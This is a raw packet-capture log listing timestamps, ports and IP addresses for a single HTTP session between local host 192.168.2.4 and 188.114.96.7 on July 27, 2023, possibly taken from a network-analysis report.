Jul 27, 2023 20:18:47.284727097 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284725904 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284773111 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284820080 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284821987 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284868002 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284914970 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284918070 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284965992 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285012960 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285015106 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.285070896 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285118103 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285118103 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.285164118 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285208941 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.285212040 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285258055 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285305977 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285330057 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.285351038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285398006 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285444021 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285446882 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.285526991 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285546064 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.285573959 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285621881 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285631895 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.285670042 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285717010 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285727978 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.285764933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285837889 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285840034 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.285886049 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285932064 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.285940886 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.285980940 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286039114 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.286051989 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286099911 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286147118 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286149025 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.286201954 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286250114 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.286254883 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286305904 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286354065 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286359072 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.286402941 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286449909 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286453962 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.286499023 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286547899 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286557913 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.286596060 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286644936 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286648035 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.286693096 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286741018 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286742926 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.286788940 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286835909 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.286837101 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286885977 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286931992 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.286933899 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.286984921 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287030935 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287030935 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287080050 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287126064 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287127018 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287173033 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287219048 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287220001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287266016 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287309885 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287313938 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287362099 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287406921 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287408113 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287456036 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287502050 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287506104 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287554026 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287597895 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287601948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287648916 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287695885 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287703991 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287744999 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287784100 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287791014 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287837982 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287877083 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287884951 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287933111 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.287945986 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.287982941 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288032055 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288078070 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288080931 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.288125992 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288172007 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288177013 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.288222075 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288288116 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288290977 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.288341045 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288388968 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288400888 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.288438082 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288486004 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.288486958 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288537025 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288582087 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.288584948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288633108 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288681030 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288681030 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.288729906 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288777113 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288813114 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.288825035 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288871050 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288872957 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.288919926 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288969994 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.288970947 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289016962 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289067030 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289076090 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289114952 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289164066 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289199114 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289239883 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289246082 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289295912 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289305925 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289344072 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289364100 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289391994 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289441109 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289489031 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289491892 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289537907 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289587021 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289627075 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289633989 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289674997 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289684057 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289732933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289772034 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289779902 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289829969 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289872885 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289877892 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289927959 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.289969921 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.289980888 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290029049 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290075064 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.290077925 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290126085 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290168047 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.290174961 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290224075 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290266991 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.290272951 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290323019 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290373087 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290421009 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290446043 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.290469885 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290498018 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.290498018 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.290518045 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290565014 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290611982 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290659904 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290704012 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.290707111 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290755033 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290793896 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.290802956 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290849924 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290888071 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.290901899 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290954113 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.290992975 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291002989 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291054010 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291101933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291112900 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291153908 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291193008 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291201115 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291249990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291286945 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291300058 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291346073 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291385889 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291394949 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291444063 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291481972 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291490078 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291531086 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291537046 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291584015 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291584969 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291635990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291677952 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291685104 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291732073 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291773081 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291780949 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291829109 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291877031 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.291877031 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291927099 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.291976929 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292010069 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292042017 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292076111 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292109013 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292141914 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292175055 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292222023 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292228937 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.292289972 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292289972 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.292340040 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292387962 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292391062 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.292437077 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292481899 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.292484999 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292535067 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292581081 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.292584896 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292632103 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292676926 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.292681932 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292731047 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292768002 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.292778969 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292825937 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292871952 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292918921 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.292970896 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293019056 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293077946 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293090105 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293090105 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293122053 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293127060 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293162107 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293174028 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293220997 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293255091 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293267965 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293314934 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293348074 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293361902 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293409109 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293445110 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293457985 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293526888 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293534040 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293534040 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293576002 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293612957 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293625116 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293672085 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293706894 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293720007 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293766975 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293804884 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293816090 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293863058 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293900013 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.293912888 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293962955 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.293998003 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.294011116 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294059038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294092894 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.294105053 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294152975 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294184923 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.294198990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294245005 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294279099 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.294297934 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294343948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294378996 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.294389963 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294435978 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294481039 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294488907 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.294528008 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294563055 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.294572115 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294621944 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.294658899 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.297012091 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.313361883 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313415051 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313435078 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313448906 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313462973 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313484907 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313548088 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313616037 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.313657999 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313693047 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.313730955 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313754082 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313767910 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.313869953 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313890934 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.313905001 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.314075947 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314096928 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314111948 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.314162016 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314197063 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.314235926 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314435959 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314460993 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314469099 CEST	49683	80	192.168.2.4	188.114.96.7
